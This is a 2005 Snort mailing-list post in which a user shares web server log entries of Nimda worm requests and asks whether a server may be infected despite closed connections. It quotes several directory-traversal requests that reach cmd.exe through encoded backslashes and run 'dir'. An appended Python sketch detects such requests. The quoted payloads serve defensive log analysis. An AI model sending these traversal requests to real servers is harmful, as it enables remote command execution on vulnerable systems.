Snort mailing list archives

Nimda Question


From: patrick.patenaude () bell ca
Date: Tue, 25 Jan 2005 11:41:16 -0500

I am a little confused over a couple of log results I have picked up.
One has a connection closed and the other not. I know this is NIMDA; can
someone confirm that, even if the connection got closed, it is
possible that the server got infected? I do not have access to the
server, so I cannot look into it right now.

Here are the logs:

This is one server, several attempts:

GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dr r HTTP/1.0..Host:
www..Connnection: close....

GET
/msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe
?/c+dir 32/cmd.exe?/c+dir HTTP/1.0..Host: www..Connnection: close....

GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
c+dir HTTP/1.0..Host: www..Connnection: close....

Here is the other server:

GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..
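
Added example, not part of the original message: a Python sketch that normalizes the request targets logged above (percent-decoding, folding the %5c backslashes into slashes) and flags paths that climb above the URL root and end at cmd.exe. The function names and the final benign request are constructed for illustration; a match shows only that the attempt was made, since the logged request does not include the server's response.

```python
import re
from urllib.parse import unquote

# Request lines taken from the post (trimmed at the first wrapped line);
# the last entry is a constructed benign request for contrast.
SAMPLES = [
    "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dr r HTTP/1.0",
    "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir",
    "GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..",
    "GET /scripts/report.asp?id=7 HTTP/1.0",
]

def normalize(path):
    """Percent-decode until stable (at most 3 rounds, which covers double
    encoding), then fold backslashes and repeated slashes into one '/'."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return re.sub(r"/+", "/", path.replace("\\", "/"))

def escapes_root(path):
    """True if '..' segments climb above the URL root at any point."""
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        if depth < 0:
            return True
    return False

def classify(request_line):
    """Return the normalized path and a verdict for one logged request line."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    raw_path, _, query = target.partition("?")
    path = normalize(raw_path)
    shell = path.lower().endswith("/cmd.exe")
    escapes = escapes_root(path)
    verdict = "cmd.exe traversal attempt" if shell and escapes else "no match"
    return {"path": path, "escapes_root": escapes, "shell": shell,
            "command": query, "verdict": verdict}

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line)["verdict"], "<-", line)
```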
